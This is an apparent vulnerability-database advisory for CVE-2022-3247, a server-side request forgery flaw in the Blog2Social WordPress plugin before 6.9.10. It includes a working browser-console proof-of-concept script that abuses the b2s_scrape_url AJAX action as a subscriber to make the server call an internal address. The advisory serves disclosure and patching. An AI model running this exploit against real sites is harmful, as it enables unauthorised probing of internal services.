Lucene search
Sakri Rafael KoskimiesWPEX-ID:EE312F22-CA58-451D-A1CB-3F78A6E5ECAFHistoryOct 03, 2022 - 12:00 a.m.
Blog2Social < 6.9.10 - Subscriber+ SSRF
2022-10-0300:00:00
Sakri Rafael Koskimies
166
blog2social
ssrf
exploit
wp-admin
0.001 Low
EPSS
Percentile
25.0%
The plugin does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks
Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social)
// Set this callback_url to the internal url you want the server to call
callback_url = 'http://127.0.0.1:8080/';
wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php';
// Don't edit below
data = new FormData();
data.append('action', 'b2s_scrape_url');
data.append('url', callback_url);
data.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val());
fetch(wp_site_ajax_url, {
method: 'POST',
credentials: 'same-origin',
body: data
});
Related
patchstack
patchstack
cve
cve
CVE-2022-3247
2022-10-25 17:15:56
cvelist
cvelist
CVE-2022-3247 Blog2Social < 6.9.10 - Subscriber+ SSRF
2022-10-25 00:00:00
nvd
nvd
CVE-2022-3247
2022-10-25 17:15:56
wpvulndb
wpvulndb
Blog2Social < 6.9.10 - Subscriber+ SSRF
2022-10-03 00:00:00
prion
prion
Server side request forgery (ssrf)
2022-10-25 17:15:00
openvas
openvas
WordPress Blog2Social Plugin < 6.9.10 Multiple Vulnerabilities
2023-01-11 00:00:00